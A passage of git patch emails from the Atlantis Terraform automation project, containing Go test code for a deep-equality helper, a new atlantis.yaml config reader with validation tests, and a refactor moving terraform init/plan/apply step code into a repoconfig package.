== nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "slice[2]: 3 != 333" { + t.Error("wrong diff:", diff[0]) + } + + b = b[0:2] + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "slice[2]: 3 != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(b, a) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "slice[2]: != 3" { + t.Error("wrong diff:", diff[0]) + } + + var c []int + diff = deep.Equal(a, c) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "[1 2 3] != " { + t.Error("wrong diff:", diff[0]) + } + + diff = deep.Equal(c, a) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != " != [1 2 3]" { + t.Error("wrong diff:", diff[0]) + } +} + +func TestPointer(t *testing.T) { + type T struct { + i int + } + a := &T{i: 1} + b := &T{i: 1} + diff := deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } + + a = nil + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != " != deep_test.T" { + t.Error("wrong diff:", diff[0]) + } + + a = b + b = nil + diff = deep.Equal(a, b) + if diff == nil { + t.Fatal("no diff") + } + if len(diff) != 1 { + t.Error("too many diff:", diff) + } + if diff[0] != "deep_test.T != " { + t.Error("wrong diff:", diff[0]) + } + + a = nil + b = nil + diff = deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } +} + +func TestTime(t *testing.T) { + // In an interable kind (i.e. a struct) + type sTime struct { + T time.Time + } + now := time.Now() + got := sTime{T: now} + expect := sTime{T: now.Add(1 * time.Second)} + diff := deep.Equal(got, expect) + if len(diff) != 1 { + t.Error("expected 1 diff:", diff) + } + + // Directly + a := now + b := now + diff = deep.Equal(a, b) + if len(diff) > 0 { + t.Error("should be equal:", diff) + } +} + +func TestInterface(t *testing.T) { + a := map[string]interface{}{ + "foo": map[string]string{ + "bar": "a", + }, + } + b := map[string]interface{}{ + "foo": map[string]string{ + "bar": "b", + }, + } + diff := deep.Equal(a, b) + if len(diff) == 0 { + t.Fatalf("expected 1 diff, got zero") + } + if len(diff) != 1 { + t.Errorf("expected 1 diff, got %d", len(diff)) + } +} + +func TestInterface2(t *testing.T) { + defer func() { + if val := recover(); val != nil { + t.Fatalf("panic: %v", val) + } + }() + + a := map[string]interface{}{ + "bar": 1, + } + b := map[string]interface{}{ + "bar": 1.23, + } + diff := deep.Equal(a, b) + if len(diff) == 0 { + t.Fatalf("expected 1 diff, got zero") + } + if len(diff) != 1 { + t.Errorf("expected 1 diff, got %d", len(diff)) + } +} + +func TestInterface3(t *testing.T) { + type Value struct{ int } + a := map[string]interface{}{ + "foo": &Value{}, + } + b := map[string]interface{}{ + "foo": 1.23, + } + diff := deep.Equal(a, b) + if len(diff) == 0 { + t.Fatalf("expected 1 diff, got zero") + } + + if len(diff) != 1 { + t.Errorf("expected 1 diff, got: %s", diff) + } +} + +func TestError(t *testing.T) { + a := errors.New("it broke") + b := errors.New("it broke") + + diff := deep.Equal(a, b) + if len(diff) != 0 { + t.Fatalf("expected zero diffs, got %d: %s", len(diff), diff) + } + + b = errors.New("it fell apart") + diff = deep.Equal(a, b) + if len(diff) != 1 { + t.Fatalf("expected 1 diff, got %d", len(diff)) + } + if diff[0] != "it broke != it fell apart" { + t.Errorf("got '%s', expected 'it broke != it fell apart'", diff[0]) + } + + // Both errors set + type tWithError struct { + Error error + } + t1 := tWithError{ + Error: a, + } + t2 := tWithError{ + Error: b, + } + diff = deep.Equal(t1, t2) + if len(diff) != 1 { + t.Fatalf("expected 1 diff, got %d", len(diff)) + } + if diff[0] != "Error: it broke != it fell apart" { + t.Errorf("got '%s', expected 'Error: it broke != it fell apart'", diff[0]) + } + + // Both errors nil + t1 = tWithError{ + Error: nil, + } + t2 = tWithError{ + Error: nil, + } + diff = deep.Equal(t1, t2) + if len(diff) != 0 { + t.Log(diff) + t.Fatalf("expected 0 diff, got %d", len(diff)) + } + + // One error is nil + t1 = tWithError{ + Error: errors.New("foo"), + } + t2 = tWithError{ + Error: nil, + } + diff = deep.Equal(t1, t2) + if len(diff) != 1 { + t.Log(diff) + t.Fatalf("expected 1 diff, got %d", len(diff)) + } + if diff[0] != "Error: *errors.errorString != " { + t.Errorf("got '%s', expected 'Error: *errors.errorString != '", diff[0]) + } +} + +func TestNil(t *testing.T) { + type student struct { + name string + age int + } + + mark := student{"mark", 10} + var someNilThing interface{} = nil + diff := deep.Equal(someNilThing, mark) + if diff == nil { + t.Error("Nil value to comparision should not be equal") + } + diff = deep.Equal(mark, someNilThing) + if diff == nil { + t.Error("Nil value to comparision should not be equal") + } + diff = deep.Equal(someNilThing, someNilThing) + if diff != nil { + t.Error("Nil value to comparision should not be equal") + } +} From 42b6646cbe82005b3da4af856f492009f7fd8029 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 24 Mar 2018 18:50:01 -0700 Subject: [PATCH 07/69] Implement config reader and parser --- server/events/repoconfig/reader.go | 71 +++ server/events/repoconfig/reader_test.go | 612 ++++++++++++++++++++++++ 2 files changed, 683 insertions(+) create mode 100644 server/events/repoconfig/reader.go create mode 100644 server/events/repoconfig/reader_test.go diff --git a/server/events/repoconfig/reader.go b/server/events/repoconfig/reader.go new file mode 100644 index 0000000000..77d4e505dc --- /dev/null +++ b/server/events/repoconfig/reader.go @@ -0,0 +1,71 @@ +package repoconfig + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "github.com/pkg/errors" + "gopkg.in/yaml.v2" +) + +const AtlantisYAMLFilename = "atlantis.yaml" +const PlanStageName = "plan" +const ApplyStageName = "apply" + +type Reader struct{} + +// ReadConfig returns the parsed and validated config for repoDir. +// If there was no config, it returns a nil pointer. If there was an error +// in parsing it returns the error. +func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) { + configFile := filepath.Join(repoDir, AtlantisYAMLFilename) + configData, err := ioutil.ReadFile(configFile) + + // If the file doesn't exist return nil. + if err != nil && os.IsNotExist(err) { + return nil, nil + } + + // If it exists but we couldn't read it return an error. + if err != nil { + return nil, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + } + + // If the config file exists, parse it. + config, err := r.parseAndValidate(configData) + if err != nil { + return nil, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + } + return &config, err +} + +func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) { + var repoConfig RepoConfig + if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { + // Unmarshal error messages aren't fit for user output. We need to + // massage them. + // todo: fix "field autoplan not found in struct repoconfig.alias" errors + return repoConfig, errors.New(strings.Replace(err.Error(), " into repoconfig.RepoConfig", "", -1)) + } + + // Validate version. + if repoConfig.Version != 2 { + // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. + return repoConfig, errors.New("unknown version: must have \"version: 2\" set") + } + + // Validate projects. + if len(repoConfig.Projects) == 0 { + return repoConfig, errors.New("'projects' key must exist and contain at least one element") + } + + for i, project := range repoConfig.Projects { + if project.Dir == "" { + return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) + } + } + return repoConfig, nil +} diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go new file mode 100644 index 0000000000..20e36c9cf6 --- /dev/null +++ b/server/events/repoconfig/reader_test.go @@ -0,0 +1,612 @@ +package repoconfig_test + +import ( + "io/ioutil" + "path/filepath" + "testing" + + "github.com/runatlantis/atlantis/server/events/repoconfig" + . "github.com/runatlantis/atlantis/testing" +) + +func TestReadConfig_DirDoesNotExist(t *testing.T) { + r := repoconfig.Reader{} + conf, err := r.ReadConfig("/not/exist") + Ok(t, err) + Assert(t, conf == nil, "exp nil ptr") +} + +func TestReadConfig_FileDoesNotExist(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + + r := repoconfig.Reader{} + conf, err := r.ReadConfig(tmpDir) + Ok(t, err) + Assert(t, conf == nil, "exp nil ptr") +} + +func TestReadConfig_BadPermissions(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) + Ok(t, err) + + r := repoconfig.Reader{} + _, err = r.ReadConfig(tmpDir) + ErrContains(t, "unable to read atlantis.yaml file: ", err) +} + +func TestReadConfig_UnmarshalErrors(t *testing.T) { + // We only have a few cases here because we assume the YAML library to be + // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. + cases := []struct { + description string + input string + expErr string + }{ + { + "random characters", + "slkjds", + "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds`", + }, + { + "just a colon", + ":", + "parsing atlantis.yaml: yaml: did not find expected key", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + r := repoconfig.Reader{} + _, err = r.ReadConfig(tmpDir) + ErrEquals(t, c.expErr, err) + }) + } +} + +func TestReadConfig_Invalid(t *testing.T) { + cases := []struct { + description string + input string + expErr string + }{ + // Invalid version. + { + description: "no version", + input: `projects: +- dir: "." +`, + expErr: "unknown version: must have \"version: 2\" set", + }, + { + description: "unsupported version", + input: `version: 0 +projects: +- dir: "." +`, + expErr: "unknown version: must have \"version: 2\" set", + }, + { + description: "empty version", + input: `version: ~ +projects: +- dir: "." +`, + expErr: "unknown version: must have \"version: 2\" set", + }, + + // No projects specified. + { + description: "no projects key", + input: `version: 2`, + expErr: "'projects' key must exist and contain at least one element", + }, + { + description: "empty projects list", + input: `version: 2 +projects:`, + expErr: "'projects' key must exist and contain at least one element", + }, + + // Project must have dir set. + { + description: "project with no config", + input: `version: 2 +projects: +-`, + expErr: "project at index 0 invalid: dir key must be set and non-empty", + }, + { + description: "project without dir set", + input: `version: 2 +projects: +- workspace: "staging"`, + expErr: "project at index 0 invalid: dir key must be set and non-empty", + }, + { + description: "project with dir set to empty string", + input: `version: 2 +projects: +- dir: ""`, + expErr: "project at index 0 invalid: dir key must be set and non-empty", + }, + { + description: "project with no config at index 1", + input: `version: 2 +projects: +- dir: "." +-`, + expErr: "project at index 1 invalid: dir key must be set and non-empty", + }, + // { + // "project with unknown key", + // `version: 2 + //projects: + //- unknown: value`, + // // todo: fix this test case + // "project at index 1 invalid: dir key must be set and non-empty", + // }, + // todo: more test cases + + // project workflow doesn't exist + // workflow has plan and apply keys (otherwise no point specifying it) + // plan/apply stages must have non-empty steps key + + // Test the steps key. + { + description: "unsupported step type", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - unsupported`, + expErr: "unsupported step type: \"unsupported\"", + }, + + // Init step. + { + description: "unsupported arg to init step", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: ["hi"] + hi: bye +`, + expErr: "unsupported key \"hi\" for step init – the only supported key is extra_args", + }, + { + description: "invalid value type to init step's extra_args", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: arg +`, + expErr: "expected array of strings as value of extra_args, not \"arg\"", + }, + + // Plan step. + { + description: "unsupported arg to plan step", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - plan: + extra_args: ["hi"] + hi: bye +`, + expErr: "unsupported key \"hi\" for step plan – the only supported key is extra_args", + }, + { + description: "invalid value type to plan step's extra_args", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - plan: + extra_args: arg +`, + expErr: "expected array of strings as value of extra_args, not \"arg\"", + }, + + // Apply step. + { + description: "unsupported arg to apply step", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - apply: + extra_args: ["hi"] + hi: bye +`, + expErr: "unsupported key \"hi\" for step apply – the only supported key is extra_args", + }, + { + description: "invalid value type to apply step's extra_args", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - apply: + extra_args: arg +`, + expErr: "expected array of strings as value of extra_args, not \"arg\"", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := repoconfig.Reader{} + _, err = r.ReadConfig(tmpDir) + ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) + }) + } +} + +func TestReadConfig_Successes(t *testing.T) { + basicProjects := []repoconfig.Project{ + { + AutoPlan: &repoconfig.AutoPlan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + Workspace: "default", + TerraformVersion: "", + ApplyRequirements: nil, + Workflow: "", + Dir: ".", + }, + } + + cases := []struct { + description string + input string + expOutput repoconfig.RepoConfig + }{ + { + description: "uses project defaults", + input: `version: 2 +projects: +- dir: "."`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + }, + }, + { + description: "autoplan is enabled by default", + input: `version: 2 +projects: +- dir: "." + auto_plan: + when_modified: ["**/*.tf"] +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + }, + }, + { + description: "if workflows not defined, there are none", + input: `version: 2 +projects: +- dir: "." +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + }, + }, + { + description: "if workflows key set but with no workflows there are none", + input: `version: 2 +projects: +- dir: "." +workflows: ~ +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + }, + }, + { + description: "if a workflow is defined but set to null we use the defaults", + input: `version: 2 +projects: +- dir: "." +workflows: + default: ~ +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "if a plan or apply has no steps defined then we use the defaults", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + apply: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "if a plan or apply has no steps defined then we use the defaults", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + apply: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + apply: + steps: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: nil, + }, + Apply: &repoconfig.Stage{ + Steps: nil, + }, + }, + }, + }, + }, + { + description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + apply: + steps: +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: nil, + }, + Apply: &repoconfig.Stage{ + Steps: nil, + }, + }, + }, + }, + }, + { + description: "if steps are set then we parse them properly", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init + apply: + steps: + - plan # we don't validate if they make sense +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "plan", + }, + }, + }, + }, + }, + }, + }, + { + description: "we parse extra_args for the steps", + input: `version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: [] + apply: + steps: + - plan: + extra_args: ["a", "b"] +`, + expOutput: repoconfig.RepoConfig{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]repoconfig.Workflow{ + "default": { + Plan: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "init", + ExtraArgs: nil, + }, + }, + }, + Apply: &repoconfig.Stage{ + Steps: []repoconfig.StepConfig{ + { + StepType: "plan", + ExtraArgs: []string{"a", "b"}, + }, + }, + }, + }, + }, + }, + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := repoconfig.Reader{} + act, err := r.ReadConfig(tmpDir) + Ok(t, err) + Equals(t, &c.expOutput, act) + }) + } +} From 75a55dd6967fb04f33fac4cb788f361db1eff5ea Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 24 Mar 2018 18:51:33 -0700 Subject: [PATCH 08/69] Moved into new package --- server/events/atlantisyaml/init_step.go | 32 ----------- .../apply_step.go | 12 ++--- .../apply_step_test.go | 33 +++++------- server/events/repoconfig/init_step.go | 20 +++++++ .../init_step_test.go | 12 ++--- .../{atlantisyaml => repoconfig}/plan_step.go | 15 +++--- .../plan_step_test.go | 54 +++++++++---------- 7 files changed, 76 insertions(+), 102 deletions(-) delete mode 100644 server/events/atlantisyaml/init_step.go rename server/events/{atlantisyaml => repoconfig}/apply_step.go (62%) rename server/events/{atlantisyaml => repoconfig}/apply_step_test.go (74%) create mode 100644 server/events/repoconfig/init_step.go rename server/events/{atlantisyaml => repoconfig}/init_step_test.go (87%) rename server/events/{atlantisyaml => repoconfig}/plan_step.go (80%) rename server/events/{atlantisyaml => repoconfig}/plan_step_test.go (90%) diff --git a/server/events/atlantisyaml/init_step.go b/server/events/atlantisyaml/init_step.go deleted file mode 100644 index a25cb94fe4..0000000000 --- a/server/events/atlantisyaml/init_step.go +++ /dev/null @@ -1,32 +0,0 @@ -package atlantisyaml - -import "github.com/hashicorp/go-version" - -// InitStep runs `terraform init`. -type InitStep struct { - ExtraArgs []string - TerraformExecutor TerraformExec - Meta StepMeta -} - -func (i *InitStep) Run() (string, error) { - // If we're running < 0.9 we have to use `terraform get` instead of `init`. - if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { - i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) - terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) - _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } else { - _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } -} - -// MustConstraint returns a constraint. It panics on error. -func MustConstraint(constraint string) version.Constraints { - c, err := version.NewConstraint(constraint) - if err != nil { - panic(err) - } - return c -} diff --git a/server/events/atlantisyaml/apply_step.go b/server/events/repoconfig/apply_step.go similarity index 62% rename from server/events/atlantisyaml/apply_step.go rename to server/events/repoconfig/apply_step.go index c75d4ae3c2..d883c3a02c 100644 --- a/server/events/atlantisyaml/apply_step.go +++ b/server/events/repoconfig/apply_step.go @@ -1,19 +1,15 @@ -package atlantisyaml +package repoconfig import ( "fmt" "os" "path/filepath" - - "github.com/runatlantis/atlantis/server/events/vcs" ) // ApplyStep runs `terraform apply`. type ApplyStep struct { - ExtraArgs []string - VCSClient vcs.ClientProxy - TerraformExecutor TerraformExec - Meta StepMeta + ExtraArgs []string + Meta StepMeta } func (a *ApplyStep) Run() (string, error) { @@ -24,5 +20,5 @@ func (a *ApplyStep) Run() (string, error) { } tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath) - return a.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) + return a.Meta.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) } diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/repoconfig/apply_step_test.go similarity index 74% rename from server/events/atlantisyaml/apply_step_test.go rename to server/events/repoconfig/apply_step_test.go index 0502ab2e1f..37e0af2f71 100644 --- a/server/events/atlantisyaml/apply_step_test.go +++ b/server/events/repoconfig/apply_step_test.go @@ -1,23 +1,22 @@ -package atlantisyaml_test +package repoconfig_test import ( "io/ioutil" - "os" "path/filepath" "testing" "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events/atlantisyaml" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" . "github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := atlantisyaml.ApplyStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.ApplyStep{ + Meta: repoconfig.StepMeta{ Workspace: "workspace", AbsolutePath: "nonexistent/path", DirRelativeToRepoRoot: ".", @@ -31,11 +30,11 @@ func TestRun_NoDir(t *testing.T) { } func TestRun_NoPlanFile(t *testing.T) { - tmpDir, cleanup := tmpDir_stepTests(t) + tmpDir, cleanup := TempDir(t) defer cleanup() - s := atlantisyaml.ApplyStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.ApplyStep{ + Meta: repoconfig.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", @@ -49,7 +48,7 @@ func TestRun_NoPlanFile(t *testing.T) { } func TestRun_Success(t *testing.T) { - tmpDir, cleanup := tmpDir_stepTests(t) + tmpDir, cleanup := TempDir(t) defer cleanup() planPath := filepath.Join(tmpDir, "workspace.tfplan") err := ioutil.WriteFile(planPath, nil, 0644) @@ -59,17 +58,17 @@ func TestRun_Success(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.11.4") - s := atlantisyaml.ApplyStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.ApplyStep{ + Meta: repoconfig.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). @@ -79,11 +78,3 @@ func TestRun_Success(t *testing.T) { Equals(t, "output", output) terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") } - -// tmpDir_stepTests creates a temporary directory and returns its path along -// with a cleanup function to be called via defer. -func tmpDir_stepTests(t *testing.T) (string, func()) { - tmpDir, err := ioutil.TempDir("", "") - Ok(t, err) - return tmpDir, func() { os.RemoveAll(tmpDir) } -} diff --git a/server/events/repoconfig/init_step.go b/server/events/repoconfig/init_step.go new file mode 100644 index 0000000000..022399c4fb --- /dev/null +++ b/server/events/repoconfig/init_step.go @@ -0,0 +1,20 @@ +package repoconfig + +// InitStep runs `terraform init`. +type InitStep struct { + ExtraArgs []string + Meta StepMeta +} + +func (i *InitStep) Run() (string, error) { + // If we're running < 0.9 we have to use `terraform get` instead of `init`. + if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { + i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) + terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) + _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } else { + _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } +} diff --git a/server/events/atlantisyaml/init_step_test.go b/server/events/repoconfig/init_step_test.go similarity index 87% rename from server/events/atlantisyaml/init_step_test.go rename to server/events/repoconfig/init_step_test.go index 8704f832df..1996e18d18 100644 --- a/server/events/atlantisyaml/init_step_test.go +++ b/server/events/repoconfig/init_step_test.go @@ -1,12 +1,12 @@ -package atlantisyaml_test +package repoconfig_test import ( "testing" "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events/atlantisyaml" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" "github.com/runatlantis/atlantis/server/logging" @@ -43,18 +43,18 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := atlantisyaml.InitStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.InitStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", TerraformVersion: tfVersion, + TerraformExecutor: terraform, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). diff --git a/server/events/atlantisyaml/plan_step.go b/server/events/repoconfig/plan_step.go similarity index 80% rename from server/events/atlantisyaml/plan_step.go rename to server/events/repoconfig/plan_step.go index 646506381b..6e7df0db0b 100644 --- a/server/events/atlantisyaml/plan_step.go +++ b/server/events/repoconfig/plan_step.go @@ -1,4 +1,4 @@ -package atlantisyaml +package repoconfig import ( "fmt" @@ -14,9 +14,8 @@ const defaultWorkspace = "default" // PlanStep runs `terraform plan`. type PlanStep struct { - ExtraArgs []string - TerraformExecutor TerraformExec - Meta StepMeta + ExtraArgs []string + Meta StepMeta } func (p *PlanStep) Run() (string, error) { @@ -42,7 +41,7 @@ func (p *PlanStep) Run() (string, error) { tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile) } - return p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) + return p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) } // switchWorkspace changes the terraform workspace if necessary and will create @@ -68,7 +67,7 @@ func (p *PlanStep) switchWorkspace() error { // already in the right workspace then no need to switch. This will save us // about ten seconds. This command is only available in > 0.10. if !runningZeroPointNine { - workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) + workspaceShowOutput, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) if err != nil { return err } @@ -83,11 +82,11 @@ func (p *PlanStep) switchWorkspace() error { // we can create it if it doesn't. To do this we can either select and catch // the error or use list and then look for the workspace. Both commands take // the same amount of time so that's why we're running select here. - _, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) if err != nil { // If terraform workspace select fails we run terraform workspace // new to create a 